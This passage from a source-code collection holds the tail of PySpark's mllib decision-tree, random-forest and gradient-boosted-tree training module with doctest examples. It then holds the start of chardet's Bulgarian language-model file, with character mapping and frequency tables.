.. note:: In Python, predict cannot currently be used within an RDD
transformation or action.
Call predict directly on the RDD instead.
:param x:
Data point (feature vector), or an RDD of data points (feature
vectors).
"""
if isinstance(x, RDD):
return self.call("predict", x.map(_convert_to_vector))
else:
return self.call("predict", _convert_to_vector(x))
@since("1.1.0")
def numNodes(self):
"""Get number of nodes in tree, including leaf nodes."""
return self._java_model.numNodes()
@since("1.1.0")
def depth(self):
"""
Get depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
"""
return self._java_model.depth()
def __repr__(self):
""" summary of model. """
return self._java_model.toString()
@since("1.2.0")
def toDebugString(self):
""" full model. """
return self._java_model.toDebugString()
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.DecisionTreeModel"
class DecisionTree(object):
"""
Learning algorithm for a decision tree model for classification or
regression.
.. versionadded:: 1.1.0
"""
@classmethod
def _train(cls, data, type, numClasses, features, impurity="gini", maxDepth=5, maxBins=32,
minInstancesPerNode=1, minInfoGain=0.0):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be RDD of LabeledPoint"
model = callMLlibFunc("trainDecisionTreeModel", data, type, numClasses, features,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
return DecisionTreeModel(model)
@classmethod
@since("1.1.0")
def trainClassifier(cls, data, numClasses, categoricalFeaturesInfo,
impurity="gini", maxDepth=5, maxBins=32, minInstancesPerNode=1,
minInfoGain=0.0):
"""
Train a decision tree model for classification.
:param data:
Training data: RDD of LabeledPoint. Labels should take values
{0, 1, ..., numClasses-1}.
:param numClasses:
Number of classes for classification.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param impurity:
Criterion used for information gain calculation.
Supported values: "gini" or "entropy".
(default: "gini")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 5)
:param maxBins:
Number of bins used for finding splits at each node.
(default: 32)
:param minInstancesPerNode:
Minimum number of instances required at child nodes to create
the parent split.
(default: 1)
:param minInfoGain:
Minimum info gain required to create a split.
(default: 0.0)
:return:
DecisionTreeModel.
Example usage:
>>> from numpy import array
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import DecisionTree
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(1.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>> model = DecisionTree.trainClassifier(sc.parallelize(data), 2, {})
>>> print(model)
DecisionTreeModel classifier of depth 1 with 3 nodes
>>> print(model.toDebugString())
DecisionTreeModel classifier of depth 1 with 3 nodes
If (feature 0 <= 0.5)
Predict: 0.0
Else (feature 0 > 0.5)
Predict: 1.0
<BLANKLINE>
>>> model.predict(array([1.0]))
1.0
>>> model.predict(array([0.0]))
0.0
>>> rdd = sc.parallelize([[1.0], [0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", numClasses, categoricalFeaturesInfo,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
@classmethod
@since("1.1.0")
def trainRegressor(cls, data, categoricalFeaturesInfo,
impurity="variance", maxDepth=5, maxBins=32, minInstancesPerNode=1,
minInfoGain=0.0):
"""
Train a decision tree model for regression.
:param data:
Training data: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param impurity:
Criterion used for information gain calculation.
The only supported value for regression is "variance".
(default: "variance")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 5)
:param maxBins:
Number of bins used for finding splits at each node.
(default: 32)
:param minInstancesPerNode:
Minimum number of instances required at child nodes to create
the parent split.
(default: 1)
:param minInfoGain:
Minimum info gain required to create a split.
(default: 0.0)
:return:
DecisionTreeModel.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import DecisionTree
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 0.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 0.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> model = DecisionTree.trainRegressor(sc.parallelize(sparse_data), {})
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {1: 0.0}))
0.0
>>> rdd = sc.parallelize([[0.0, 1.0], [0.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "regression", 0, categoricalFeaturesInfo,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
@inherit_doc
class RandomForestModel(TreeEnsembleModel, JavaLoader):
"""
Represents a random forest model.
.. versionadded:: 1.2.0
"""
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.RandomForestModel"
class RandomForest(object):
"""
Learning algorithm for a random forest model for classification or
regression.
.. versionadded:: 1.2.0
"""
supportedFeatureSubsetStrategies = ("auto", "all", "sqrt", "log2", "onethird")
@classmethod
def _train(cls, data, algo, numClasses, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy, impurity, maxDepth, maxBins, seed):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be RDD of LabeledPoint"
if featureSubsetStrategy not in cls.supportedFeatureSubsetStrategies:
raise ValueError("unsupported featureSubsetStrategy: %s" % featureSubsetStrategy)
if seed is None:
seed = random.randint(0, 1 << 30)
model = callMLlibFunc("trainRandomForestModel", data, algo, numClasses,
categoricalFeaturesInfo, numTrees, featureSubsetStrategy, impurity,
maxDepth, maxBins, seed)
return RandomForestModel(model)
@classmethod
@since("1.2.0")
def trainClassifier(cls, data, numClasses, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy="auto", impurity="gini", maxDepth=4, maxBins=32,
seed=None):
"""
Train a random forest model for binary or multiclass
classification.
:param data:
Training dataset: RDD of LabeledPoint. Labels should take values
{0, 1, ..., numClasses-1}.
:param numClasses:
Number of classes for classification.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param numTrees:
Number of trees in the random forest.
:param featureSubsetStrategy:
Number of features to consider for splits at each node.
Supported values: "auto", "all", "sqrt", "log2", "onethird".
If "auto" is set, this parameter is set based on numTrees:
if numTrees == 1, set to "all";
if numTrees > 1 (forest) set to "sqrt".
(default: "auto")
:param impurity:
Criterion used for information gain calculation.
Supported values: "gini" or "entropy".
(default: "gini")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 4)
:param maxBins:
Maximum number of bins used for splitting features.
(default: 32)
:param seed:
Random seed for bootstrapping and choosing feature subsets.
Set as None to generate seed based on system time.
(default: None)
:return:
RandomForestModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import RandomForest
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(0.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>> model = RandomForest.trainClassifier(sc.parallelize(data), 2, {}, 3, seed=42)
>>> model.numTrees()
3
>>> model.totalNumNodes()
7
>>> print(model)
TreeEnsembleModel classifier with 3 trees
<BLANKLINE>
>>> print(model.toDebugString())
TreeEnsembleModel classifier with 3 trees
<BLANKLINE>
Tree 0:
Predict: 1.0
Tree 1:
If (feature 0 <= 1.5)
Predict: 0.0
Else (feature 0 > 1.5)
Predict: 1.0
Tree 2:
If (feature 0 <= 1.5)
Predict: 0.0
Else (feature 0 > 1.5)
Predict: 1.0
<BLANKLINE>
>>> model.predict([2.0])
1.0
>>> model.predict([0.0])
0.0
>>> rdd = sc.parallelize([[3.0], [1.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", numClasses,
categoricalFeaturesInfo, numTrees, featureSubsetStrategy, impurity,
maxDepth, maxBins, seed)
@classmethod
@since("1.2.0")
def trainRegressor(cls, data, categoricalFeaturesInfo, numTrees, featureSubsetStrategy="auto",
impurity="variance", maxDepth=4, maxBins=32, seed=None):
"""
Train a random forest model for regression.
:param data:
Training dataset: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param numTrees:
Number of trees in the random forest.
:param featureSubsetStrategy:
Number of features to consider for splits at each node.
Supported values: "auto", "all", "sqrt", "log2", "onethird".
If "auto" is set, this parameter is set based on numTrees:
if numTrees == 1, set to "all";
if numTrees > 1 (forest) set to "onethird" for regression.
(default: "auto")
:param impurity:
Criterion used for information gain calculation.
The only supported value for regression is "variance".
(default: "variance")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 4)
:param maxBins:
Maximum number of bins used for splitting features.
(default: 32)
:param seed:
Random seed for bootstrapping and choosing feature subsets.
Set as None to generate seed based on system time.
(default: None)
:return:
RandomForestModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import RandomForest
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> model = RandomForest.trainRegressor(sc.parallelize(sparse_data), {}, 2, seed=42)
>>> model.numTrees()
2
>>> model.totalNumNodes()
4
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {0: 1.0}))
0.5
>>> rdd = sc.parallelize([[0.0, 1.0], [1.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.5]
"""
return cls._train(data, "regression", 0, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy, impurity, maxDepth, maxBins, seed)
@inherit_doc
class GradientBoostedTreesModel(TreeEnsembleModel, JavaLoader):
"""
Represents a gradient-boosted tree model.
.. versionadded:: 1.3.0
"""
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.GradientBoostedTreesModel"
class GradientBoostedTrees(object):
"""
Learning algorithm for a gradient boosted trees model for
classification or regression.
.. versionadded:: 1.3.0
"""
@classmethod
def _train(cls, data, algo, categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be RDD of LabeledPoint"
model = callMLlibFunc("trainGradientBoostedTreesModel", data, algo, categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
return GradientBoostedTreesModel(model)
@classmethod
@since("1.3.0")
def trainClassifier(cls, data, categoricalFeaturesInfo,
loss="logLoss", numIterations=100, learningRate=0.1, maxDepth=3,
maxBins=32):
"""
Train a gradient-boosted trees model for classification.
:param data:
Training dataset: RDD of LabeledPoint. Labels should take values
{0, 1}.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param loss:
Loss function used for minimization during gradient boosting.
Supported values: "logLoss", "leastSquaresError",
"leastAbsoluteError".
(default: "logLoss")
:param numIterations:
Number of iterations of boosting.
(default: 100)
:param learningRate:
Learning rate for shrinking the contribution of each estimator.
The learning rate should be between in the interval (0, 1].
(default: 0.1)
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 3)
:param maxBins:
Maximum number of bins used for splitting features. DecisionTree
requires maxBins >= max categories.
(default: 32)
:return:
GradientBoostedTreesModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import GradientBoostedTrees
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(0.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>>
>>> model = GradientBoostedTrees.trainClassifier(sc.parallelize(data), {}, numIterations=10)
>>> model.numTrees()
10
>>> model.totalNumNodes()
30
>>> print(model) # it already has newline
TreeEnsembleModel classifier with 10 trees
<BLANKLINE>
>>> model.predict([2.0])
1.0
>>> model.predict([0.0])
0.0
>>> rdd = sc.parallelize([[2.0], [0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
@classmethod
@since("1.3.0")
def trainRegressor(cls, data, categoricalFeaturesInfo,
loss="leastSquaresError", numIterations=100, learningRate=0.1, maxDepth=3,
maxBins=32):
"""
Train a gradient-boosted trees model for regression.
:param data:
Training dataset: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param loss:
Loss function used for minimization during gradient boosting.
Supported values: "logLoss", "leastSquaresError",
"leastAbsoluteError".
(default: "leastSquaresError")
:param numIterations:
Number of iterations of boosting.
(default: 100)
:param learningRate:
Learning rate for shrinking the contribution of each estimator.
The learning rate should be between in the interval (0, 1].
(default: 0.1)
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 3)
:param maxBins:
Maximum number of bins used for splitting features. DecisionTree
requires maxBins >= max categories.
(default: 32)
:return:
GradientBoostedTreesModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import GradientBoostedTrees
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> data = sc.parallelize(sparse_data)
>>> model = GradientBoostedTrees.trainRegressor(data, {}, numIterations=10)
>>> model.numTrees()
10
>>> model.totalNumNodes()
12
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {0: 1.0}))
0.0
>>> rdd = sc.parallelize([[0.0, 1.0], [1.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "regression", categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
def _test():
import doctest
globs = globals().copy()
from pyspark.sql import SparkSession
spark = SparkSession.builder\
.master("local[4]")\
.appName("mllib.tree tests")\
.getOrCreate()
globs['sc'] = spark.sparkContext
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| apache-2.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langbulgarianmodel.py | 2965 | 12784 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
# this table is modified base on win1251BulgarianCharToOrderMap, so
# only number <64 is sure valid
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80
210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90
81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80
221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90
88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0
73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences:3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0,
0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0,
0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0,
0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0,
0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3,
2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,
3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2,
1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0,
3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1,
1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0,
2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2,
2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0,
3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2,
1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,
2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2,
2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2,
1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0,
2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2,
2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,
2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2,
1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0,
2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2,
1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,
